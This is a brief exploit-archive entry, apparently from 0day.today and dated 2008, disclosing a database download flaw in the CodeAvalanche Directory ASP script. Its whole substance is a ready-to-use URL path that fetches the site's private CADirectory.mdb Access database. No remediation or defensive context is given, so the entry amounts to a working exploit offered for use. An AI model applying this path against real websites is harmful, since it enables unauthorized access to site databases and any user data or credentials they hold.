id: 4457
date: 12/15/2008
title: CodeAvalanche Directory (CADirectory.mdb) Database Disclosure Vuln
author: Pouya_Server
cves: 

==================================================================
CodeAvalanche Directory (CADirectory.mdb) Database Disclosure Vuln
==================================================================


#########################################################
---------------------------------------------------------
Portal Name: CADirectory
Download : http://www.truecontent.info/codeavalanche/asp-directory-script.php
Author : Pouya_Server 
Vulnerability : (DD)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/CAdirectory/_private/CADirectory.mdb
 
---------------------------------



#  0day.today [2023-03-25]  #